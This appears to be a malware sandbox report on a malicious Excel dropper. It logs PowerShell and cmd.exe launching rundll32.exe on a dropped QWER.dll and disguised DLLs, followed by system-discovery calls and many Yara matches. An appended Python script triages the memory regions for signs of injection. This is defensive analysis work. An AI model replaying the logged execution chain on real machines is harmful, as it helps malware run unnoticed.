Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer
Source: Yara match File source: 364453688149503140239183.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\364453688149503140239183.xls, type: DROPPED

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information

Source: Yara match File source: 12.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e90000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2850000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a30000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.b20000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3020000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a30000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a30000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.b80000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2860000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.470000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c90000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.24f0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.25e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.440000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2dd0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.24f0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.30b0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.ac0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c60000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.b20000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d00000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.5a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.b50000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.b50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e60000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26d0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2860000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c60000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.8f0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.b50000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.b00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.ae0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.bc0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ec0000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27e0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d00000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.b50000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.470000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED
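The match list above mixes three source types: carved PE images (".unpack"), raw process memory regions (".sdmp") and a dropped file. The memory-dump names carry the hex PID, the region base address and the Win32 protection and type values, so they can be triaged automatically: a Yara hit inside a MEM_PRIVATE region with PAGE_EXECUTE_READWRITE protection is the classic shape of injected code, while a hit in a MEM_IMAGE region at 0x10001000 is a loaded DLL. The following Python is an added example written for this note, not code from the report or from the sandbox vendor; the field positions it reads from the .sdmp names are an assumption inferred from the listed values and standard Win32 constants (the 2nd, 6th and 8th fields are deliberately left uninterpreted), and the sample list is a constructed subset of the entries shown above.

```python
import re
from collections import Counter, defaultdict

# Win32 memory constants (MEMORY_BASIC_INFORMATION.Protect / .Type).
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

# ASSUMPTION: the sandbox's .sdmp naming is not documented on the page. The
# positions used here (hex PID, <unused>, counter, base address, protection,
# <unused>, region type, <unused>) are inferred from the listed values.
SDMP_RE = re.compile(
    r"^([0-9a-f]{8})\.([0-9a-f]{8})\.(\d+)\.([0-9a-f]{16})"
    r"\.([0-9a-f]{8})\.([0-9a-f]{8})\.([0-9a-f]{8})\.([0-9a-f]{8})\.sdmp$", re.I)
# "<decimal pid>.<n>.<image>.<base hex>.<n>[.raw].unpack"
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+)\.([0-9a-f]+)\.(\d+)(?:\.raw)?\.unpack$", re.I)

# Constructed subset of the Yara-match sources listed in this report.
SOURCES = [
    "15.2.rundll32.exe.a00000.5.raw.unpack",
    "10.2.rundll32.exe.b10000.6.unpack",
    "10.2.rundll32.exe.10000000.14.unpack",
    "0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp",
    "0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp",
    "0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp",
    "0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp",
    "00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp",
    "C:\\ProgramData\\QWER.dll",
]


def parse_source(name):
    """Split one Yara-match source string into its extracted fields."""
    m = SDMP_RE.match(name)
    if m:
        return {"kind": "memory", "pid": int(m.group(1), 16),
                "base": int(m.group(4), 16), "protect": int(m.group(5), 16),
                "type": int(m.group(7), 16)}
    m = UNPACK_RE.match(name)
    if m:
        return {"kind": "unpackedpe", "pid": int(m.group(1)),
                "image": m.group(3), "base": int(m.group(4), 16)}
    return {"kind": "dropped", "path": name}


def classify(rec):
    """Label a memory region: image-backed code vs private RWX/RX allocations
    (a private RWX region holding a Yara hit is the usual injection shape)."""
    if rec["kind"] != "memory":
        return rec["kind"]
    if rec["type"] == MEM_IMAGE:
        return "image"
    if rec["type"] == MEM_PRIVATE:
        return "private_rwx" if rec["protect"] == PAGE_EXECUTE_READWRITE else "private_rx"
    return "other"


def summarize(sources):
    """Per-PID Counter of source classes."""
    out = defaultdict(Counter)
    for s in sources:
        rec = parse_source(s)
        if "pid" in rec:
            out[rec["pid"]][classify(rec)] += 1
    return dict(out)


def injected_pids(sources):
    """PIDs holding a Yara-matching private RWX region: the first processes
    to pull full memory from during incident response."""
    return sorted(pid for pid, c in summarize(sources).items() if c["private_rwx"])


def correlate(sources):
    """Pair each carved PE with the memory region it came from
    (same PID and same base address)."""
    recs = [parse_source(s) for s in sources]
    mem = {(r["pid"], r["base"]) for r in recs if r["kind"] == "memory"}
    return [(r["pid"], r["base"]) for r in recs
            if r["kind"] == "unpackedpe" and (r["pid"], r["base"]) in mem]


if __name__ == "__main__":
    for pid, counts in sorted(summarize(SOURCES).items()):
        print(f"pid {pid}: {dict(counts)}")
    print("injected:", injected_pids(SOURCES))
    print("carved PE <-> region:", [(p, hex(b)) for p, b in correlate(SOURCES)])
```

On the constructed subset the carved PE at 0xa00000 in PID 15 and the one at 0xb10000 in PID 10 both line up with RWX private regions in the same processes, which is the evidence to cite when reporting rundll32.exe as the Emotet host process rather than the Excel parent.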